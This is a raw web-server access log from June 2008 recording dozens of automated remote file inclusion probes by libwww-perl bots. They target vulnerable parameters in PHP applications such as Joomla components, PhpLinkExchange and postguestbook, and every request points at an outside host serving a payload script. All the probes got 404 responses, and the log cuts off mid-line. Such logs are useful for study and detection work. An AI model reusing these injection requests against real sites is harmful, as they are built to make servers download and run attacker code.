87.253.213.4 - - [22/Jun/2008:02:31:17 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.79"
87.253.213.4 - - [22/Jun/2008:02:31:17 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.79"
213.35.225.138 - - [22/Jun/2008:02:31:38 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.805"
213.35.225.138 - - [22/Jun/2008:02:31:39 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.805"
87.230.21.32 - - [22/Jun/2008:02:31:53 -0500] "GET /logs//administrator/components/inurl:/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2knowit.net/modules/id2.txt? HTTP/1.1" 404 373 "-""libwww-perl/5.803"
87.230.21.32 - - [22/Jun/2008:02:31:54 -0500] "GET //administrator/components/inurl:/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://www.2knowit.net/modules/id2.txt? HTTP/1.1" 404 368 "-""libwww-perl/5.803"
87.106.18.76 - - [22/Jun/2008:02:32:17 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:02:32:23 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
207.218.234.146 - - [22/Jun/2008:02:32:51 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.810"
207.218.234.146 - - [22/Jun/2008:02:32:51 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.810"
89.149.241.207 - - [22/Jun/2008:02:33:13 -0500] "GET /logs//postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 330 "-""libwww-perl/5.811"
89.149.241.207 - - [22/Jun/2008:02:33:13 -0500] "GET //postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 325 "-""libwww-perl/5.811"
212.227.127.11 - - [22/Jun/2008:02:33:50 -0500] "GET /logs/inc/cmses/aedatingCMS.php?dir[inc]=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.805"
212.227.127.11 - - [22/Jun/2008:02:33:50 -0500] "GET /inc/cmses/aedatingCMS.php?dir[inc]=http://yourmynumberone.com/mx5club/images/id1.txt?? HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:02:34:45 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:02:34:50 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:02:34:55 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
87.106.18.76 - - [22/Jun/2008:02:35:01 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:02:37:08 -0500] "GET /logs/main.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
190.34.160.226 - - [22/Jun/2008:02:37:09 -0500] "GET /main.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.126.108.198 - - [22/Jun/2008:02:38:11 -0500] "GET /logs///xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://manga-scan.siteburg.com/id.txt???? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:38:12 -0500] "GET ///xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://manga-scan.siteburg.com/id.txt???? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
66.212.18.238 - - [22/Jun/2008:02:39:39 -0500] "GET /logs/ktedit/toolbar.php?dirDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
66.212.18.238 - - [22/Jun/2008:02:39:39 -0500] "GET /ktedit/toolbar.php?dirDepth=http://mastiarea.info/downloads/help01.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:02:40:03 -0500] "GET /logs/access_log.1207785600//spaw_control.class.php?spaw_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:02:40:03 -0500] "GET //spaw_control.class.php?spaw_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
72.9.228.149 - - [22/Jun/2008:02:40:03 -0500] "GET /logs//spaw_control.class.php?spaw_root=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 312 "-""libwww-perl/5.812"
200.126.108.198 - - [22/Jun/2008:02:40:31 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
200.126.108.198 - - [22/Jun/2008:02:40:31 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.userena.cl/dgae/arab.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
87.230.21.32 - - [22/Jun/2008:02:42:06 -0500] "GET /logs//administrator/components/inurl:/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://soerabaya.id.txt?? HTTP/1.1" 404 373 "-""libwww-perl/5.803"
87.230.21.32 - - [22/Jun/2008:02:42:07 -0500] "GET //administrator/components/inurl:/com_chronocontact/excelwriter/Writer/BIFFwriter.php?mosConfig_absolute_path=http://soerabaya.id.txt?? HTTP/1.1" 404 368 "-""libwww-perl/5.803"
89.149.241.207 - - [22/Jun/2008:02:42:55 -0500] "GET /logs//sohoadmin/program/modules/includes/login.php?_SESSION[docroot_path]=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.811" 89.149.241.207 - - [2